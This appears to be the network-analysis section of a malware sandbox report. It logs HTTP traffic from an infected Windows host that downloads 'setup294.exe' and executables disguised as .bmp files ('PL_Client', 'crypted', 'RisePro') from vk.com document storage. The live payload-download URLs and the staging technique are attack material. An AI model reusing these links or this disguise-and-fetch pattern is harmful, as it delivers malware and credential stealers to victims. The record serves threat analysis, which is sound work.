Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E8YkFzPPR46H%2Bn9IDBdhO4EJlGfzw20ibOGWnPVn1ofYKdCveG%2BFnzWVZb8pzwtA67jobcJKZ5rhIrEi1ViGxzjMgE5mUMC0Rpr8X7OUMtaux2YoYMYaaJvn4pqR9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451ab4dc0019ec-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:14 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 328249 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Wed, 09 Oct 2024 01:48:40 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; expires=Thu, 10 Oct 2024 06:39:14 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=ab98f408bfdbed871a; expires=Mon, 14 Oct 2024 15:06:25 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; expires=Thu, 10 Oct 2024 22:22:09 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: schematize.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Content-Type: application/x-msdos-program Content-Length: 2444344 Connection: keep-alive Last-Modified: Wed, 11 Oct 2023 05:44:03 GMT ETag: "254c38-6076a4f8f8ec0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2909 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pOaFgka%2FHQg5iZMvaPpAMVu%2FLYfdSxQ2E9cBISPCwzbuQiXL%2FZKdxwDF4mXsqz6WqhBZt21BrUzu0BSuTWM8Q2XAgjCNoApaATV7TM04CPIDnhwd6hSCGKtGZoB94Xjq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451aed69e219d2-KIX alt-svc: h3=":443"; ma=86400

GET /doc52355237_666778887?hash=MsypGwgfzH9k8tAFuGqJl0MJgVVDiak3EKsK8zRZBXP&dl=zbnEaURFd1h1t5v6QgcpBauCKgnVbU0YGtRdWYWulE8&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:21 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909418/u52355237/docs/d49/157bd218c256/Bot_Clien.bmp?extra=WUvO1XI1uqSHPkWtf0VHtIzTVHgGyRARItFKI-Nkl-RCUrue3bu_n5dnWoMdYi-uNjIibwh_8pnJLTQMpb6Q6CoOijCEVVGotsDlH9yz4k_iRnCQH75ndCjMFugsVh7Hldwu1lHUjEssXTAV X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666668172?hash=wwfZZzZZokN7qGd0uT31zdZN97zwBwUnQptWvOtzuj0&dl=CVnxQYTnwznuyYRMd8eUICnCWdIJZdojYQtP4hgKiGs&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:21 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909228/u52355237/docs/d13/a82d91b97f12/s328sadfg.bmp?extra=6xWrrlo6Cv0Gdb_7Fs8AohN3jYPbW7Anu6IsH5tYR28Bazoiwle7XANsbcn_ojgZepaG3C3V7-EO8tfU3sUEWyzpTTMiOhD3f_RKBRuB6cEngZu5y8U_bC5GVV3LMEZpPK42aJxtw0YqR8a7 X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u52355237/docs/d13/a82d91b97f12/s328sadfg.bmp?extra=6xWrrlo6Cv0Gdb_7Fs8AohN3jYPbW7Anu6IsH5tYR28Bazoiwle7XANsbcn_ojgZepaG3C3V7-EO8tfU3sUEWyzpTTMiOhD3f_RKBRuB6cEngZu5y8U_bC5GVV3LMEZpPK42aJxtw0YqR8a7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:22 GMT Content-Type: image/x-ms-bmp Content-Length: 349188 Connection: keep-alive Last-Modified: Sat, 07 Oct 2023 13:37:48 GMT ETag: "65215f2c-55404" Expires: Fri, 10 Nov 2023 06:39:22 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c909418/u52355237/docs/d49/157bd218c256/Bot_Clien.bmp?extra=WUvO1XI1uqSHPkWtf0VHtIzTVHgGyRARItFKI-Nkl-RCUrue3bu_n5dnWoMdYi-uNjIibwh_8pnJLTQMpb6Q6CoOijCEVVGotsDlH9yz4k_iRnCQH75ndCjMFugsVh7Hldwu1lHUjEssXTAV HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:22 GMT Content-Type: image/x-ms-bmp Content-Length: 7538844 Connection: keep-alive Last-Modified: Tue, 10 Oct 2023 11:07:13 GMT ETag: "65253061-73089c" Expires: Fri, 10 Nov 2023 06:39:22 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666718867?hash=rZYzbFYXXCWmOqgw03u9u3XToWkECzsXfTtsULQ1lTo&dl=tC2Kp75zzEgipXGxgSUDWzlqSeDLzQjiUXjIFZBV8gc&api=1&no_preview=1#test22 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:24 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c235131/u52355237/docs/d48/3398ce617636/test22.bmp?extra=lo5VKmrOf36tyYmGEcwOwY2zpfSYN7fGQ2yXdt90r_7u24cra1AqPMMLmZLxPp4rZZJiTArlHuqGw__SdvVcgrgz1C5fLKEivr7XNn8u1qzJAN2TrvJhzqfyAbrB3AF-DLwMdohQlTY21hLG X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235131/u52355237/docs/d48/3398ce617636/test22.bmp?extra=lo5VKmrOf36tyYmGEcwOwY2zpfSYN7fGQ2yXdt90r_7u24cra1AqPMMLmZLxPp4rZZJiTArlHuqGw__SdvVcgrgz1C5fLKEivr7XNn8u1qzJAN2TrvJhzqfyAbrB3AF-DLwMdohQlTY21hLG HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:26 GMT Content-Type: image/x-ms-bmp Content-Length: 804868 Connection: keep-alive Last-Modified: Sun, 08 Oct 2023 20:04:04 GMT ETag: "65230b34-c4804" Expires: Fri, 10 Nov 2023 06:39:26 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666756864?hash=6DFeRVc5RezUEATw70eLHr8HvfHAogkWHkFr13KIngP&dl=VWkHxUBsFZ3HkLZ5PiRwJi45M39XiIm0Y75Z3olHyw0&api=1&no_preview=1#kk HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:27 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c237331/u52355237/docs/d51/1bd250750449/51.bmp?extra=NuQ59cemfVjpdbicEDrrfsVJcohTmO0y7-2ttyR96xIzm_w-N1Tb_oIiG5fNJLWDleJMcediI2xJAYmUxsli3TdNhgqUp4Z7uXyPxh030Az7OK_mZTvfLw-7sBSGpkSUZ2zaDqxVcAGn4TCN X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237331/u52355237/docs/d51/1bd250750449/51.bmp?extra=NuQ59cemfVjpdbicEDrrfsVJcohTmO0y7-2ttyR96xIzm_w-N1Tb_oIiG5fNJLWDleJMcediI2xJAYmUxsli3TdNhgqUp4Z7uXyPxh030Az7OK_mZTvfLw-7sBSGpkSUZ2zaDqxVcAGn4TCN HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:28 GMT Content-Type: image/x-ms-bmp Content-Length: 1229316 Connection: keep-alive Last-Modified: Mon, 09 Oct 2023 18:31:32 GMT ETag: "65244704-12c204" Expires: Fri, 10 Nov 2023 06:39:28 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666778810?hash=a0C18Yh08hANR7cCctmCh90MT3krBIkk4s3AR7nGkB4&dl=AUlI6iExE9qVYw6mhta9PECgosFse5VMWbDYzR3ISkL&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:28 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c235031/u52355237/docs/d44/f1da833abf33/crypted.bmp?extra=2XY-uciChBIpPgYdT6Wh5rOVAqndE6E26Wl3HlTrZVbWUUvG8hWvWDsSa4_aAiOD3O8c0QwQyXspglH2XZUCpChASve6HqKl5wNA7qTO5nYs0cfUPaT83_ObjaFQepb-p8krkTffz9kq27hz X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235031/u52355237/docs/d44/f1da833abf33/crypted.bmp?extra=2XY-uciChBIpPgYdT6Wh5rOVAqndE6E26Wl3HlTrZVbWUUvG8hWvWDsSa4_aAiOD3O8c0QwQyXspglH2XZUCpChASve6HqKl5wNA7qTO5nYs0cfUPaT83_ObjaFQepb-p8krkTffz9kq27hz HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:29 GMT Content-Type: image/x-ms-bmp Content-Length: 500492 Connection: keep-alive Last-Modified: Tue, 10 Oct 2023 11:05:26 GMT ETag: "65252ff6-7a30c" Expires: Fri, 10 Nov 2023 06:39:29 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666723616?hash=ZC4RFT6HYu0N5BMvznxOuSILUiBeo5z2g1xHHcrldpw&dl=zwWXc0xksFhKkzynWxdvo03M0BMI9Y0XCitbIZ8FVKc&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:30 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909228/u52355237/docs/d55/79524fc6ee6e/PL_Client.bmp?extra=Kde4pa27E6nTlThwI1jPmz7Zxa08aZBfOrc_9NSCYxoaYt0MmEt10PQTDujcbtrYFCSTWMZpCLN1MkqZEdJP0UnKAj8m4QVyFvvzeY5GGcGgWlZ5ldPy5SVg89O6jgA587BEQuCjUOJ_mYqg X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909228/u52355237/docs/d55/79524fc6ee6e/PL_Client.bmp?extra=Kde4pa27E6nTlThwI1jPmz7Zxa08aZBfOrc_9NSCYxoaYt0MmEt10PQTDujcbtrYFCSTWMZpCLN1MkqZEdJP0UnKAj8m4QVyFvvzeY5GGcGgWlZ5ldPy5SVg89O6jgA587BEQuCjUOJ_mYqg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:30 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Mon, 09 Oct 2023 04:30:10 GMT ETag: "652381d2-383e04" Expires: Fri, 10 Nov 2023 06:39:30 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:32 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 328265 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666772349?hash=hYVRMj3VXZEN6TuoRIyuNJBsp1uaaX2imFKbcIG1Vfg&dl=9cyMlTApKcbHG0TjdzdQvAAFPBW96Jc1btF9S5guV48&api=1&no_preview=1#rise HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:39:32 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c236331/u52355237/docs/d18/ba602f90184f/RisePro.bmp?extra=ZGSHOj1SUKWsH9ciwC-NMNEuCzdk89-6fYkmfW9tGEmTbEfaM_j2y3Qp0FbpJdu5JJekdSeKyhjyXDKHi20ulCqEs8RYDPqp8q5FMnmauoNbcTgxiior7j1_0fqQ6mBVUqbACDeY8atU2Czs X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c236331/u52355237/docs/d18/ba602f90184f/RisePro.bmp?extra=ZGSHOj1SUKWsH9ciwC-NMNEuCzdk89-6fYkmfW9tGEmTbEfaM_j2y3Qp0FbpJdu5JJekdSeKyhjyXDKHi20ulCqEs8RYDPqp8q5FMnmauoNbcTgxiior7j1_0fqQ6mBVUqbACDeY8atU2Czs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:33 GMT Content-Type: image/x-ms-bmp Content-Length: 5743620 Connection: keep-alive Last-Modified: Tue, 10 Oct 2023 08:32:50 GMT ETag: "65250c32-57a404" Expires: Fri, 10 Nov 2023 06:39:33 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:39:34 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 328264 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

